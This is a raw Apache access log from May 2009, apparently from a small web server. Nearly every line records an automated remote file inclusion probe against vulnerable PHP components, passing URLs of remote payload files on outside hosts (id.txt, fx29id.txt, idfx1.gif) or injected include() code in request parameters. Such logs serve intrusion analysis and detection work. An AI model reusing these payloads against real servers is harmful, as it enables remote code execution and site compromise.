91.121.210.42 - - [25/May/2009:03:29:31 -0400] "GET /logs/access_log.Q108091400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.172.22.2 - - [25/May/2009:03:29:43 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
66.172.22.2 - - [25/May/2009:03:29:43 -0400] "GET /logs/access_log.Q109010700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
66.172.22.2 - - [25/May/2009:03:29:43 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
66.172.22.2 - - [25/May/2009:03:29:52 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
66.172.22.2 - - [25/May/2009:03:29:52 -0400] "GET /logs/access_log.Q109010700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
66.172.22.2 - - [25/May/2009:03:29:52 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
58.227.193.198 - - [25/May/2009:03:29:54 -0400] "GET ///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:29:54 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:29:54 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:30:03 -0400] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:30:04 -0400] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:30:07 -0400] "GET /logs/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:30:07 -0400] "GET /?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:30:07 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:30:09 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:30:14 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:30:17 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:30:34 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:30:34 -0400] "GET /?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:30:34 -0400] "GET /logs/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:30:36 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:30:42 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:30:45 -0400] "GET /logs/access_log.Q109050900/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:30:55 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:31:03 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:31:05 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:31:05 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:31:05 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:31:05 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:31:06 -0400] "GET /logs/access_log.Q109050900/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:03:31:07 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:31:08 -0400] "GET /logs/access_log.Q108091400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
194.214.239.83 - - [25/May/2009:03:31:12 -0400] "GET //include/print_category.php?setup%5Buse_category%5D=1&dir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.0" 404 225 "-" "Mozilla/5.0"
194.214.239.83 - - [25/May/2009:03:31:12 -0400] "GET /logs//include/print_category.php?setup%5Buse_category%5D=1&dir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
194.214.239.83 - - [25/May/2009:03:31:13 -0400] "GET /logs/access_log.Q109051800//include/print_category.php?setup%5Buse_category%5D=1&dir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.0" 404 252 "-" "Mozilla/5.0"
66.172.22.2 - - [25/May/2009:03:31:31 -0400] "GET /logs/error_log.Q108120400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
209.59.12.99 - - [25/May/2009:03:31:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.212.165.114 - - [25/May/2009:03:31:45 -0400] "GET /logs/access_log.Q108091400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
67.212.165.114 - - [25/May/2009:03:31:50 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.172.22.2 - - [25/May/2009:03:31:56 -0400] "GET /logs/error_log.Q108120400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
91.121.210.42 - - [25/May/2009:03:32:10 -0400] "GET /logs/access_log.Q109050300//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:32:10 -0400] "GET /logs/access_log.Q108091400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:32:16 -0400] "GET /?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:03:32:16 -0400] "GET /logs/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:32:19 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/disgore/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
94.23.200.54 - - [25/May/2009:03:32:19 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/disgore/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
110.45.145.92 - - [25/May/2009:03:32:30 -0400] "GET /logs/access_log.Q108062800/?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:32:42 -0400] "GET /logs/access_log.Q108091400/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:32:48 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:33:04 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:33:48 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [25/May/2009:03:34:11 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
75.126.49.163 - - [25/May/2009:03:35:03 -0400] "GET /logs/error_log.Q108121200///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
75.126.49.163 - - [25/May/2009:03:35:03 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 200 2764 "-" "libwww-perl/5.811"
88.84.130.178 - - [25/May/2009:03:35:37 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:03:35:37 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:03:35:38 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:03:35:46 -0400] "GET /logs/access_log.Q108091400%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:35:52 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:35:59 -0400] "GET /show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:36:00 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:36:00 -0400] "GET /logs/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:36:14 -0400] "GET /logs/access_log.Q108091400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:03:36:14 -0400] "GET /logs/access_log.Q109050300//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:16 -0400] "GET /logs/error_log.Q108090500/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:16 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:16 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:16 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:16 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:16 -0400] "GET /logs/error_log.Q108090500/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:20 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:20 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:20 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:21 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:21 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:21 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
75.126.49.163 - - [25/May/2009:03:36:22 -0400] "GET /logs/error_log.Q108111900///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
65.23.158.226 - - [25/May/2009:03:36:22 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:22 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:22 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:22 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:22 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:22 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:25 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:26 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:03:36:26 -0400] "GET /logs/access_log.Q109050300//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:26 -0400] "GET /logs/access_log.Q108061800%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:36:27 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:03:36:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.124.211 - - [25/May/2009:03:36:46 -0400] "GET /logs/access_log.Q108091400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.241.40.51 - - [25/May/2009:03:37:18 -0400] "GET /logs/error_log.Q109042900/rrors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
211.241.40.51 - - [25/May/2009:03:37:18 -0400] "GET /rrors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.241.40.51 - - [25/May/2009:03:37:18 -0400] "GET /logs/rrors.php?error=http://208.98.22.241/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
200.93.147.154 - - [25/May/2009:03:39:03 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:39:07 -0400] "GET /show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:39:07 -0400] "GET /logs/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:03:39:07 -0400] "GET /logs/access_log.Q109051100/show_news.php?cutepath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:25 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:25 -0400] "GET /logs/access_log.Q109042200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:25 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:27 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:27 -0400] "GET /logs/access_log.Q109042200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:27 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:30 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:30 -0400] "GET /logs/access_log.Q109042200%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:30 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:32 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:32 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:32 -0400] "GET /logs/access_log.Q109042200%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:32 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:32 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:35 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:35 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:35 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:03:39:35 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:03:39:42 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:45 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:48 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:48 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:48 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:50 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:50 -0400] "GET /logs/access_log.Q108062800/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:51 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:53 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:58 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:58 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:39:58 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:40:07 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:40:07 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:40:07 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:40:08 -0400] "GET /logs/access_log.Q109051800/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:40:16 -0400] "GET /logs/error_log.Q108052600/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:03:40:19 -0400] "GET /logs/access_log.Q109051800/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:40:29 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:40:30 -0400] "GET /logs/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 2758 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:40:31 -0400] "GET /logs/access_log.Q109042200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:41:05 -0400] "GET /logs/access_log.Q109042200/?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:03:41:05 -0400] "GET /?sourcedir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.24.89.21 - - [25/May/2009:03:41:05 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
